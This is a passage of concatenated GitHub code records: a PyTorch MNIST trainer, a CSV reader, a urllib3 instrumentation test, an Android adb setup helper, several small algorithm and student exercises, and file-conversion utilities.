range(len(s)):\n fail = False\n \n if i>0:\n s = s[1:] + s[0]\n \n for start, end in partner_sort.items():\n start_idx = s.find(start)\n if start_idx!=-1:\n end_idx = s.find(end)\n for j in range(s_dict.get(start)):\n \n if start_idx > end_idx:\n fail = True\n break\n \n start_idx = s.find(start, start_idx+1)\n end_idx = s.find(end, end_idx+1)\n \n if not fail:\n answer+=1\n \n return answer\n \n\n# 14 case 통과 못함\n","repo_name":"ChristinaROK/TIC","sub_path":"20210424.py","file_name":"20210424.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1811748486","text":"\"\"\"\nРазпознование цифр Mnist с помощью PyTorch.\n\nСмотрел примеры:\n\nhttps://github.com/pytorch/examples/tree/main/mnist_hogwild\n\nhttps://medium.com/@ramamurthi96/a-simple-neural-network-model-for-mnist-using-pytorch-4b8b148ecbdc\n\nhttps://machinelearningmastery.com/develop-your-first-neural-network-with-pytorch-step-by-step/\n\nhttps://www.kaggle.com/code/geekysaint/solving-mnist-using-pytorch/notebook\n\n\nНастройка pyint:\n\nhttps://gist.github.com/uuklanger/fe65dc6da9169c1585abad4ac2b0d268\n\nБыла проблема с matplotlib backend (Fedora 39)\nhttps://pygobject.readthedocs.io/en/latest/getting_started.html#fedora-getting-started\n\n1. sudo dnf install python3.11-devel\n2. pip3 install pycairo to build and install Pycairo\n3. 
pip3 install PyGObject to build and install PyGObject\n\n\nskip-connection:\nhttps://chautuankien.medium.com/skip-connection-and-explanation-of-resnet-afabe792346c\n\nhttps://discuss.pytorch.org/t/how-to-concatenate-layers-in-pytorch-similar-to-tf-keras-layers-concatenate/33736/6\n\nhttps://www.youtube.com/watch?v=5YPRbHYB5ME\n\"\"\"\nfrom typing import Tuple, Any, List\n\nimport os\n# import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport torch\n\nfrom torchvision import datasets, transforms\n\nfrom torch.utils.data import DataLoader\nfrom torch import optim, Tensor, nn\nfrom torch.nn.functional import one_hot\n\n# libraries for printing model summaries\nfrom torchsummary import summary as summary_1\nfrom torchinfo import summary as summary_2\n\nfrom prettytable import PrettyTable\n\nfrom SimpleModelWithSkipConnections import SimpleModelWithSkipConnections\n\n\ndef is_run_in_colab() -> bool:\n \"\"\"\n Is Python running in Google Colab\n :return:\n \"\"\"\n\n if os.getenv(\"COLAB_RELEASE_TAG\"):\n return True\n return False\n\n\n# store the result in a variable\nis_code_in_colab = is_run_in_colab()\n\nif is_code_in_colab:\n # lets us refresh the plot in place\n from IPython import display\n\n\ndef create_model(norm=False, dropout=False, batch_norm=False):\n \"\"\"\n Build the model\n :param batch_norm:\n Add a BatchNorm layer\n :param dropout:\n Add a Dropout layer\n :param norm:\n Add a data-normalization layer\n :return: the model\n \"\"\"\n model = nn.Sequential()\n model.append(nn.Flatten())\n\n if norm:\n model.append(nn.LayerNorm(784))\n\n model.append(nn.Linear(in_features=784, out_features=128))\n model.append(nn.ReLU())\n\n if batch_norm:\n model.append(nn.BatchNorm1d(num_features=128))\n\n if dropout:\n model.append(nn.Dropout(0.5))\n\n model.append(nn.Linear(in_features=128, out_features=64))\n model.append(nn.ReLU())\n\n if dropout:\n model.append(nn.Dropout(0.5))\n\n model.append(nn.Linear(in_features=64, out_features=10))\n model.append(nn.ReLU())\n\n # NOTE: nn.Sequential cannot express a real skip connection; re-appending the\n # 128->64 layer here would receive a 10-dim tensor and fail at runtime.\n # Use create_model_skip_con / SimpleModelWithSkipConnections for that.\n\n if dropout:\n model.append(nn.Dropout(0.25))\n\n model.append(nn.Sigmoid())\n\n return model\n\n\ndef create_model_skip_con(norm=False, dropout=False, batch_norm=False):\n \"\"\"\n Build the model with a skip connection\n :param batch_norm:\n Add a BatchNorm layer\n :param dropout:\n Add a Dropout layer\n :param norm:\n Add a data-normalization layer\n :return: the model\n \"\"\"\n return SimpleModelWithSkipConnections(norm=norm, dropout=dropout, batch_norm=batch_norm)\n\n\ndef create_model_conv2d():\n \"\"\"\n Build a more complex/heavier model\n :return:\n \"\"\"\n model = nn.Sequential()\n\n model.append(nn.Conv2d(1, 32, kernel_size=(3, 3), stride=1, padding=0))\n model.append(nn.ReLU())\n model.append(nn.Conv2d(32, 32, kernel_size=(3, 3), stride=1, padding=0))\n model.append(nn.ReLU())\n model.append(nn.MaxPool2d((2, 2)))\n model.append(nn.Dropout(0.25))\n\n model.append(nn.Flatten())\n model.append(nn.Linear(32 * 12 * 12, 128))\n model.append(nn.ReLU())\n model.append(nn.Dropout(0.5))\n model.append(nn.Linear(in_features=128, out_features=10))\n model.append(nn.Softmax(dim=1))\n\n return model\n\n\ndef print_count_parameters(model) -> int:\n \"\"\"\n Summary of model\n :param model:\n Model\n :return:\n Total Trainable Params\n \"\"\"\n table = PrettyTable([\"Modules\", \"Parameters\"])\n total_params = 0\n for name, parameter in model.named_parameters():\n params = parameter.numel()\n table.add_row([name, params])\n 
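# numel() is the element count of each parameter tensor; keep a running total alongside the table rows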
total_params += params\r\n print(table)\r\n print(f\"Total Trainable Params: {total_params}\")\r\n return total_params\r\n\r\n\r\ndef show_graphs(train_loss_hist, test_loss_hist, train_accuracy_hist, test_accuracy_hist, caption: str) -> None:\r\n \"\"\"\r\n Plot the loss and accuracy curves\r\n :param caption: title of the window with the plots\r\n :param train_loss_hist:\r\n :param test_loss_hist:\r\n :param train_accuracy_hist:\r\n :param test_accuracy_hist:\r\n :return:\r\n \"\"\"\r\n\r\n plt.figure(caption, figsize=(12, 4))\r\n\r\n plt.subplot(2, 2, 1)\r\n plt.title('Train Loss')\r\n plt.plot(np.arange(len(train_loss_hist)), train_loss_hist)\r\n plt.yscale('log')\r\n plt.grid()\r\n\r\n plt.subplot(2, 2, 2)\r\n plt.title('Test Loss')\r\n plt.plot(np.arange(len(test_loss_hist)), test_loss_hist)\r\n plt.yscale('log')\r\n plt.grid()\r\n\r\n plt.subplot(2, 2, 3)\r\n plt.title('Train Accuracy')\r\n plt.plot(np.arange(len(train_accuracy_hist)), train_accuracy_hist)\r\n plt.yscale('log')\r\n plt.grid()\r\n\r\n plt.subplot(2, 2, 4)\r\n plt.title('Test Accuracy')\r\n plt.plot(np.arange(len(test_accuracy_hist)), test_accuracy_hist)\r\n plt.yscale('log')\r\n plt.grid()\r\n\r\n plt.show()\r\n\r\n\r\ndef show_graphs_on_axis(axis: List, y: List[List], captions: List[str], clear=True) -> None:\r\n \"\"\"\r\n Draw the plots\r\n :param axis: list of axes\r\n :param y: list of data series, one per axis\r\n :param captions: list of titles for the axes\r\n :param clear: clear the previous plot\r\n :return:\r\n \"\"\"\r\n for i, ax in enumerate(axis):\r\n if clear:\r\n ax.clear()\r\n ax.plot(np.arange(len(y[i])), y[i])\r\n ax.set_title(captions[i])\r\n ax.grid(True)\r\n\r\n\r\ndef train(model, train_loader, loss_function, optimizer, device, epoch, log_interval=-1) -> Tuple[float, float]:\r\n \"\"\"\r\n Train the model and collect metrics: loss and accuracy\r\n :param model:\r\n :param train_loader:\r\n :param loss_function:\r\n :param optimizer:\r\n :param device:\r\n :param epoch:\r\n :param log_interval:\r\n :return:\r\n \"\"\"\r\n # return random.random(), random.random()\r\n model.train()\r\n\r\n total_loss = 0\r\n correct = 0\r\n for batch_idx, (data, target) in enumerate(train_loader):\r\n data, target = data.to(device), target.to(device)\r\n optimizer.zero_grad()\r\n output = model(data)\r\n loss = loss_function(output, target)\r\n\r\n prediction = output.argmax(axis=1, keepdims=True)\r\n y_n = target.argmax(axis=1, keepdims=True)\r\n correct += prediction.eq(y_n.view_as(prediction)).sum().item()\r\n\r\n loss.backward()\r\n optimizer.step()\r\n\r\n total_loss += loss.item()\r\n\r\n # '&' binds tighter than '>', so 'log_interval > 0 & (...)' tested the wrong thing; use 'and'\r\n if log_interval > 0 and (batch_idx % log_interval == 0):\r\n print(f'Train Epoch: {epoch} [{batch_idx * len(data)}/{len(train_loader.dataset)} '\r\n f'({100. 
* batch_idx / len(train_loader):.0f}%)]\\tLoss: {loss.item() / len(data):.6f}')\r\n\r\n total_items = len(train_loader.dataset)\r\n\r\n total_loss /= total_items\r\n correct /= total_items\r\n\r\n return total_loss, correct\r\n\r\n\r\ndef eval_model(model, train_loader, loss_function, device, epoch, log_interval=-1) -> Tuple[float, float]:\r\n \"\"\"\r\n Evaluate the model on the test set and collect metrics: loss and accuracy\r\n :param model:\r\n :param train_loader:\r\n :param loss_function:\r\n :param device:\r\n :param epoch:\r\n :param log_interval:\r\n :return:\r\n \"\"\"\r\n # return random.random(), random.random()\r\n model.eval()\r\n\r\n total_loss = 0\r\n correct = 0\r\n for batch_idx, (data, target) in enumerate(train_loader):\r\n data, target = data.to(device), target.to(device)\r\n output = model(data)\r\n loss = loss_function(output, target)\r\n\r\n prediction = output.argmax(axis=1, keepdims=True)\r\n y_n = target.argmax(axis=1, keepdims=True)\r\n\r\n correct += prediction.eq(y_n.view_as(prediction)).sum().item()\r\n\r\n # no backward pass during evaluation (the original loss.backward() here only accumulated stale gradients)\r\n\r\n total_loss += loss.item()\r\n\r\n if log_interval > 0 and (batch_idx % log_interval == 0):\r\n print(f'Eval Epoch: {epoch} [{batch_idx * len(data)}/{len(train_loader.dataset)} '\r\n f'({100. * batch_idx / len(train_loader):.0f}%)]\\tLoss: {loss.item() / len(data):.6f}')\r\n\r\n total_items = len(train_loader.dataset)\r\n\r\n total_loss /= total_items\r\n correct /= total_items\r\n\r\n return total_loss, correct\r\n\r\n\r\ndef one_hot_transform(target) -> Tensor:\r\n \"\"\"\r\n Transform labels to one-hot encoding\r\n :param target:\r\n :return:\r\n \"\"\"\r\n # pylint: disable=E1102\r\n return one_hot(torch.tensor(target), num_classes=10).to(dtype=torch.float)\r\n\r\n\r\ndef get_train_and_test_data(batch_size=10, batch_size_test=4) -> Tuple[Any, Any]:\r\n \"\"\"\r\n Load and prepare the data for training the model\r\n :param batch_size:\r\n :param batch_size_test:\r\n :return:\r\n \"\"\"\r\n # transform x (inputs) into tensors\r\n transform = transforms.ToTensor()\r\n\r\n # several transforms can also be chained to normalize the data and/or map it to the range [0, 1]\r\n # transform = transforms.Compose([\r\n # transforms.ToTensor(),\r\n # # transforms.Normalize((0.1307,), (0.3081,))\r\n # ])\r\n\r\n # encode y (labels) as one-hot, since they are categories\r\n\r\n target_transform = one_hot_transform\r\n\r\n print(\"mnist start load ...\")\r\n\r\n mnist_train = datasets.MNIST(root='mnist', download=True, train=True, transform=transform,\r\n target_transform=target_transform)\r\n mnist_test = datasets.MNIST(root='mnist', download=True, train=False, transform=transform,\r\n target_transform=target_transform)\r\n\r\n train_loader = DataLoader(mnist_train, batch_size=batch_size)\r\n test_loader = DataLoader(mnist_test, batch_size=batch_size_test)\r\n\r\n print(\"mnist loaded ...\")\r\n\r\n return train_loader, test_loader\r\n\r\n\r\ndef train_model(model_to_train, train_loader, test_loader, device, epochs=10, log_interval=-1, show_graph=True,\r\n show_graph_only_total=False) -> None:\r\n \"\"\"\r\n Train and evaluate the model\r\n :param model_to_train:\r\n :param train_loader:\r\n :param test_loader:\r\n :param device:\r\n :param epochs:\r\n :param log_interval:\r\n :param show_graph:\r\n :param show_graph_only_total:\r\n :return:\r\n \"\"\"\r\n loss_function = nn.CrossEntropyLoss()\r\n optimizer = optim.SGD(model_to_train.parameters(), lr=1e-1)\r\n\r\n train_loss_hist = []\r\n test_loss_hist = []\r\n\r\n train_accuracy_hist = []\r\n test_accuracy_hist = []\r\n\r\n print(f\"start train: epochs = {epochs}, device = {device}\")\r\n\r\n # Create the figure to draw on: a 2x2 grid\r\n fig, axis = plt.subplots(2, 2, figsize=(12, 8))\r\n\r\n # window title\r\n if not is_code_in_colab:\r\n 
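# a window title only exists for desktop matplotlib backends, not for inline rendering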
plt.get_current_fig_manager().set_window_title('Model training')\r\n\r\n # flatten the 2x2 grid into an array of 4 axes\r\n axis = axis.flatten()\r\n\r\n # data for the plots\r\n y = [train_loss_hist, test_loss_hist, train_accuracy_hist, test_accuracy_hist]\r\n\r\n # captions for the plots\r\n captions = [\"train_loss\", \"test_loss\", \"train_accuracy\", \"test_accuracy\"]\r\n\r\n # draw an empty plot first\r\n\r\n show_graphs_on_axis(axis, y, captions, clear=False)\r\n\r\n for i in range(epochs):\r\n\r\n train_loss, train_accuracy = train(model_to_train, train_loader, loss_function, optimizer, device, i,\r\n log_interval=log_interval)\r\n test_loss, test_accuracy = eval_model(model_to_train, test_loader, loss_function, device, i,\r\n log_interval=log_interval)\r\n\r\n print(f\"epoch: {i + 1}/{epochs}, \"\r\n f\"train_loss = {train_loss:.6f}, train_accuracy = {train_accuracy:.6f}, \"\r\n f\"test_loss = {test_loss:.6f}, test_accuracy = {test_accuracy:.6f}\")\r\n\r\n if show_graph:\r\n train_loss_hist.append(train_loss)\r\n train_accuracy_hist.append(train_accuracy)\r\n test_loss_hist.append(test_loss)\r\n test_accuracy_hist.append(test_accuracy)\r\n\r\n if not show_graph_only_total:\r\n fig.suptitle(f'Epoch {i + 1}/{epochs}')\r\n\r\n show_graphs_on_axis(axis, y, captions)\r\n\r\n # refresh and keep only one figure\r\n\r\n if is_code_in_colab:\r\n plt.tight_layout()\r\n display.display(fig)\r\n display.clear_output(wait=True)\r\n else:\r\n plt.pause(0.01)\r\n\r\n if show_graph and show_graph_only_total:\r\n show_graphs_on_axis(axis, y, captions)\r\n plt.show()\r\n\r\n\r\ndef get_device():\r\n \"\"\"\r\n Get the device for training.\r\n GPU if available, otherwise CPU\r\n :return:\r\n \"\"\"\r\n use_cuda = torch.cuda.is_available()\r\n\r\n print(f\"use_cuda = {use_cuda}\")\r\n\r\n if use_cuda:\r\n return torch.device(\"cuda\")\r\n return torch.device(\"cpu\")\r\n\r\n\r\ndef model_1(epochs=10) -> None:\r\n \"\"\"\r\n Test simple model\r\n :param epochs:\r\n :return:\r\n \"\"\"\r\n\r\n print(\"Test simple model\")\r\n\r\n # device to train on, CPU/GPU\r\n my_device = get_device()\r\n\r\n # create the model and move it to the device\r\n model = create_model(batch_norm=True).to(my_device)\r\n\r\n print(\"1. summary from torchsummary\")\r\n summary_1(model, (28, 28, 1), device=str(my_device))\r\n\r\n print(\"2. summary from torchinfo\")\r\n summary_2(model, depth=5, device=my_device)\r\n\r\n print_count_parameters(model)\r\n\r\n # load and prepare the dataset\r\n train_loader, test_loader = get_train_and_test_data()\r\n\r\n # start training\r\n\r\n train_model(model, train_loader, test_loader, device=my_device, epochs=epochs)\r\n\r\n\r\ndef model_1_1(epochs=10) -> None:\r\n \"\"\"\r\n Test simple model\r\n :param epochs:\r\n :return:\r\n \"\"\"\r\n\r\n print(\"Test simple model\")\r\n\r\n # device to train on, CPU/GPU\r\n my_device = get_device()\r\n\r\n # create the model and move it to the device\r\n model = create_model_skip_con(batch_norm=True).to(my_device)\r\n\r\n print(\"1. summary from torchsummary\")\r\n summary_1(model, (28, 28, 1), device=str(my_device))\r\n\r\n print(\"2. 
summary from torchinfo\")\n summary_2(model, depth=5, device=my_device)\n\n print_count_parameters(model)\n\n # загрузка и подготовка датасета\n train_loader, test_loader = get_train_and_test_data()\n\n # запуск обучения\n\n train_model(model, train_loader, test_loader, device=my_device, epochs=epochs)\n\n\ndef model_2(epochs=10) -> None:\n \"\"\"\n Test hard model\n :param epochs:\n :return:\n \"\"\"\n print(\"Test hard model\")\n\n # устройство на котором обучаем, CPU/GPU\n my_device = get_device()\n\n # создаем модель и переносим на устройство\n model = create_model_conv2d().to(my_device)\n\n print_count_parameters(model)\n\n # загрузка и подготовка датасета\n train_loader, test_loader = get_train_and_test_data()\n\n # запуск обучения\n\n train_model(model, train_loader, test_loader, device=my_device, epochs=epochs)\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n\n model_1_1(5)\n # model_2(30)\n","repo_name":"dimarsoft/ml_mnist","sub_path":"pytorch_mnist.py","file_name":"pytorch_mnist.py","file_ext":"py","file_size_in_byte":16695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38009429429","text":"from io import SEEK_END, SEEK_SET\nfrom os import remove\n\nclass CSVReader():\n\t'''A class used to read from CSV files'''\n\n\tSEP = ','\n\t'''The value separator'''\n\n\tdef __init__(self, path:str=None):\n\t\tself._file = None\n\t\tif path is None:\n\t\t\treturn\n\t\tif not isinstance(path, str):\n\t\t\tpath = str(path)\n\t\tself.open(path)\n\t\treturn\n\n\tdef __del__(self):\n\t\tself.close()\n\t\treturn\n\n\tdef close(self):\n\t\t'''Close the currently open CSV file if one is open'''\n\t\tif self._file is not None:\n\t\t\tself._file.close()\n\t\tself._file = None\n\t\treturn\n\n\tdef open(self, path:str):\n\t\t'''Open the CSV file pointed to by the given path'''\n\t\tif not isinstance(path, str):\n\t\t\tpath = str(path)\n\t\tif not path.endswith('.csv'):\n\t\t\traise ValueError(f'Cannot open a file that is not a csv file: {path}')\n\t\tif not self.is_open():\n\t\t\tself.close()\n\t\tself._file = open(path, 'rt')\n\t\treturn\n\n\tdef is_open(self)->bool:\n\t\t'''Does this have a CSV file open'''\n\t\treturn self._file is not None\n\n\tdef is_eof(self)->bool:\n\t\t'''Is the currently open CSV file at its end'''\n\t\tpos = self._file.tell()\n\t\tself._file.seek(0, SEEK_END)\n\t\tend_pos = self._file.tell()\n\t\tself._file.seek(pos, SEEK_SET)\n\t\treturn pos == end_pos\n\t\n\tdef read_line(self)->list[str]:\n\t\t'''Read and return one line of values'''\n\t\tif not self.is_open():\n\t\t\traise RuntimeError('No CSV file open')\n\t\tif self.is_eof():\n\t\t\traise EOFError('The CSV file has no more lines')\n\t\tline = self._file.readline().removesuffix('\\n')\n\t\tif CSVReader.SEP not in line:\n\t\t\treturn []\n\t\tvalues = line.split(CSVReader.SEP)\n\t\treturn values\n\n\tdef read_all(self)->list[list[str]]:\n\t\t'''Read and return all remaining lines of values'''\n\t\tif self._file is None:\n\t\t\traise RuntimeError('No CSV file open')\n\t\tlines = list()\n\t\twhile not self.is_eof():\n\t\t\tlines.append(self.read_line())\n\t\treturn lines\n\nif __name__ == '__main__':\n\ttest = CSVReader()\n\tassert not test.is_open()\n\tassert test._file == None\n\tdel test\n\n\tpath = './test.csv'\n\tlines = [['abc','123','','def'],[],['qwerty','1234567890'],['jkl','zxcvbnm','']]\n\twith open(path, 'wt') as file:\n\t\tfile.write(''.join([','.join(line)+'\\n' for line in lines]))\n\ttest = CSVReader(path)\n\tassert test.is_open()\n\tassert 
not test.is_eof()\n\tassert test.read_line() == lines[0]\n\tassert test.is_open()\n\tassert not test.is_eof()\n\tassert test.read_line() == lines[1]\n\tassert test.is_open()\n\tassert not test.is_eof()\n\tassert test.read_all() == lines[2:]\n\tassert test.is_open()\n\tassert test.is_eof()\n\ttest.close()\n\tassert not test.is_open()\n\tdel test\n\tremove(path)\n","repo_name":"dGameBoy101b/python-team-shuffler","sub_path":"CSVReader.py","file_name":"CSVReader.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30121362385","text":"import random\nimport threading\n\nimport mock\nimport urllib3\n\nimport opbeat\nimport opbeat.instrumentation.control\nfrom opbeat.traces import trace\nfrom tests.helpers import get_tempstoreclient\nfrom tests.utils.compat import TestCase\n\ntry:\n from http import server as SimpleHTTPServer\n from socketserver import TCPServer\nexcept ImportError:\n import SimpleHTTPServer\n from SocketServer import TCPServer\n\nclass MyTCPServer(TCPServer):\n allow_reuse_address = True\n\nclass InstrumentUrllib3Test(TestCase):\n def setUp(self):\n self.client = get_tempstoreclient()\n self.port = random.randint(50000, 60000)\n self.start_test_server()\n opbeat.instrumentation.control.instrument()\n\n def tearDown(self):\n if self.httpd:\n self.httpd.shutdown()\n\n def start_test_server(self):\n handler = SimpleHTTPServer.SimpleHTTPRequestHandler\n\n self.httpd = MyTCPServer((\"\", self.port), handler)\n\n self.httpd_thread = threading.Thread(target=self.httpd.serve_forever)\n self.httpd_thread.setDaemon(True)\n self.httpd_thread.start()\n\n @mock.patch(\"opbeat.traces.TransactionsStore.should_collect\")\n def test_urllib3(self, should_collect):\n should_collect.return_value = False\n self.client.begin_transaction(\"transaction\")\n expected_sig = 'GET localhost:{0}'.format(self.port)\n with trace(\"test_pipeline\", \"test\"):\n pool = urllib3.PoolManager(timeout=0.1)\n\n url = 'http://localhost:{0}/hello_world'.format(self.port)\n r = pool.request('GET', url)\n\n self.client.end_transaction(\"MyView\")\n\n transactions = self.client.instrumentation_store.get_all()\n traces = transactions[0]['traces']\n\n expected_signatures = ['transaction', 'test_pipeline', expected_sig]\n\n self.assertEqual(set([t['name'] for t in traces]),\n set(expected_signatures))\n\n self.assertEqual(len(traces), 3)\n\n self.assertEqual(traces[0]['name'], expected_sig)\n self.assertEqual(traces[0]['type'], 'ext.http.urllib3')\n self.assertEqual(traces[0]['context']['url'], url)\n self.assertEqual(traces[0]['parent'], 1)\n\n self.assertEqual(traces[1]['name'], 'test_pipeline')\n self.assertEqual(traces[1]['type'], 'test')\n\n self.assertEqual(traces[2]['name'], 'transaction')\n self.assertEqual(traces[2]['type'], 'transaction')\n","repo_name":"ruflin/apm-python","sub_path":"tests/instrumentation/urllib3_tests.py","file_name":"urllib3_tests.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10897064878","text":"'''Problem 11: Solve the quadratic equation ax^2 + bx + c = 0\nRoots of the equation:\nx = (-b ± sqrt(b^2 - 4ac)) / (2a)\nx1 = (- b + sqrt(b*b-4*a*c))/(2*a);\nx2 = (- b - sqrt(b*b-4*a*c))/(2*a);\n* idea\nstep 1: show a greeting\nstep 2: read the number n\nstep 3: compute:\n'''\nimport math\n\nprint(\"\\t-------------------CALCULATOR-------------------\")\na = float(input(\"Enter the value a= \"))\nb = float(input(\"Enter the value b= 
\"))\nc = float(input(\"Enter the value c= \"))\nphuong_trinh_1 = float(-b + math.sqrt(b * b - 4 * a * c) / 2 * a)\nprint(phuong_trinh_1)\n#anh chị nào chấm bài này cứu em, sao em bấm quài khong được cũng kh bít sai ở đâu huhuhuhuhu :((((","repo_name":"thanhfat2001/dev","sub_path":"python/buoi_3/bt11.py","file_name":"bt11.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73047108631","text":"#! /usr/bin/python3\n# some list\n\nfrom cmath import atan\nfrom math import atan2, pi,sqrt,pow,cos\nfrom operator import truediv\nimport random\nimport time\nimport os\n\nlist=[1,2,3,4,5,4,7]\n#list=[1,1,1,1,1,1,1]\n\n\ndef fun1(x,k):\n if ((str(x).isdigit())== True):\n if(x==k):\n return 0,x,0\n elif(xk):\n return 0,0,x\n list1=[]\n list2=[]\n list3=[]\n for i in range(0,len(x)):\n if(x[i]==k): list2.append(x[i])\n elif(x[i]\"))","repo_name":"gustavobastian/exercises-DASSOPG","sub_path":"class-1/Ejercicios_extras/7/7_6.py","file_name":"7_6.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"38112548071","text":"import os\nimport subprocess\nimport urllib3\nimport shutil\nimport sys\n\nfrom zipfile import ZipFile\n\nPLATFORM_TOOLS_LINUX_URL= \"https://dl.google.com/android/repository/platform-tools_r29.0.6-linux.zip\"\nPLATFORM_TOOLS_MAC_URL = \"https://dl.google.com/android/repository/platform-tools-latest-darwin.zip\"\n\ndef get_platformtools_url_from_system():\n if sys.platform.startswith('linux'):\n return PLATFORM_TOOLS_LINUX_URL\n else:\n return PLATFORM_TOOLS_MAC_URL\n\n\ndef has_adb_installed(command):\n try:\n proc = subprocess.Popen([command, \"--version\"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n proc.wait()\n return True\n except:\n return False\n\n\ndef download_platform_tools():\n print('[*] Downloading platform-tools ...')\n pm = urllib3.PoolManager()\n request = pm.request('GET', get_platformtools_url_from_system(), preload_content=False)\n filename = \"platform-tools.zip\"\n with request, open(filename, 'wb') as out_file:\n shutil.copyfileobj(request, out_file)\n print('[-] Download platform-tools finished')\n\n with ZipFile(filename, 'r') as zipObj:\n print('[-] Extracting ' + filename)\n zipObj.extractall()\n print('[-] File \"%s\" extracted.' % filename)\n \n os.system('chmod +x platform-tools/adb')\n\n if has_adb_installed('platform-tools/adb'):\n print(\"[>>] Android Debug Bridge (ADB) installed!\")\n\n\ndef check_adb():\n print(\"[!] 
Checking installation of Android Debug Bridge (ADB) ...\")\n adb = 'adb'\n platform_tools_adb = 'platform-tools/adb'\n\n if has_adb_installed(adb):\n print(\"[>>] Android Debug Bridge (ADB) from environment [OK]\")\n return adb\n elif has_adb_installed(platform_tools_adb):\n print(\"[>>] Android Debug Bridge (ADB) from %s [OK]\" % platform_tools_adb)\n return platform_tools_adb\n else:\n print(\"[x] Android Debug Bridge (ADB) Not Found!\")\n download_platform_tools()\n return platform_tools_adb","repo_name":"jeziellago/SecBox","sub_path":"secbox/apkextract/check_adb.py","file_name":"check_adb.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"5"} +{"seq_id":"18384542682","text":"class Solution:\n def combinationSum(self, candidates, target):\n self.result = []\n\n candidates.sort()\n self.rec(candidates, [], target, 0)\n return self.result\n\n\n def rec(self, candidates, lst, target, ind):\n current_list = lst.copy()\n if target == 0:\n self.result.append(current_list)\n return\n\n if target < 0:\n return\n\n for i in range(ind, len(candidates)):\n current_list.append(candidates[i])\n self.rec(candidates, current_list, target - candidates[i], i)\n del current_list[-1]\n\ns = Solution()\n\nprint(s.combinationSum([2, 3, 6, 7], 7))\n\n","repo_name":"jesuszarate/CTCI","sub_path":"GeneralApproachToBackTracking/combination_sum.py","file_name":"combination_sum.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71692273111","text":"import sys\n\nn = int(input())\n\nif n == 4 or n == 7 :\n print('-1')\n sys.exit()\n\na = n%5\nif a is 1 or a is 3:\n a = n//5 + 1\n print(a)\nelse:\n a = n//5 + 2\n print(a)","repo_name":"neguri/dojo","sub_path":"boj/2839.py","file_name":"2839.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8314842417","text":"def sanitize(content):\n return content.replace(\" \",\"\").replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n\n\ndef main():\n with open(\"binary_as_text\", \"r\") as f:\n content = f.read()\n content = sanitize(content)\n\n bin_content = b''\n for i in range(len(content)//2):\n byte = content[i*2:i*2+2]\n bin_content += bytes([int(byte, 16)])\n\n with open(\"generated_binary\", \"wb\") as dest:\n dest.write(bin_content)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ShingekiNoChikungunya/palio-fire-2006","sub_path":"binary_from_text.py","file_name":"binary_from_text.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73400036312","text":"def searchInsert(nums, target):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type target: int\r\n :rtype: int\r\n \"\"\"\r\n if target in nums:\r\n return nums.index(target)\r\n else:\r\n for idx, value in enumerate(nums):\r\n print(nums[idx - 1], value, nums[idx - 1] < target, target < value)\r\n if idx > 0 and nums[idx - 1] < target and target < value:\r\n return idx\r\n return len(nums)\r\n \r\nprint(searchInsert([1,3,5,6], 7))","repo_name":"viktor-kindrat/my_python_practise","sub_path":"leetcode_tasks/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28743345227","text":"\nimport pandas as pd\nimport 
math\nimport string\nimport training.utils as utils\nimport training.config as config\n\n\n\ndef convertODStoTSV(fromODS, toTSV): \n\n data = utils.read_ods(fromODS)\n df = pd.DataFrame(data)\n\n print(len(df))\n words_list = []\n tags_list = []\n\n\n for ind in df.index:\n\n if df['Word'][ind] == '.' and df['Tag'][ind] == '.':\n words_list.append('.')\n tags_list.append('.')\n continue\n if df['Word'][ind] == 'XXX':\n words_list.append('\\n')\n else:\n words_list.append(df['Word'][ind])\n\n if df['Tag'][ind][:2] in ('B-', 'I-'):\n tags_list.append(df['Tag'][ind])\n \n else:\n tags_list.append('O')\n \n \n data_dict = {'Word': words_list, 'Tag': tags_list} # avoid shadowing the builtin name 'dict'\n df = pd.DataFrame(data_dict)\n\n print(len(df)) \n df.to_csv(toTSV,sep='\\t', index=False)\n\n\n# convertODStoTSV('/home/accubits/Documents/Projects/AI/resume/training/training_dataset/Education.ods' \\\n# , '/home/accubits/Documents/Projects/AI/resume/training/training_dataset/Education.tsv')","repo_name":"raoofnaushad/resume_parser_nlp","sub_path":"training/odsToTsv.py","file_name":"odsToTsv.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8435039500","text":"#!/usr/bin/python\n\n# to run these tests: python3 -m unittest \n\nimport unittest\nimport os\nimport os.path as path\nimport shutil\n\ntest_dir = \"checkdaqconfig_testfiles\"\ntest_hash = \"7d134aad8c722085dda3b78b2ba20233\"\n\ndef get_test_dir(test_folder):\n global test_dir\n base_dir, _ = path.split(path.abspath(__file__))\n abs_test_dir = path.join(base_dir, test_dir)\n return path.join(abs_test_dir, test_folder)\n\ndef test_master(self, files):\n \"\"\"\n Test that the 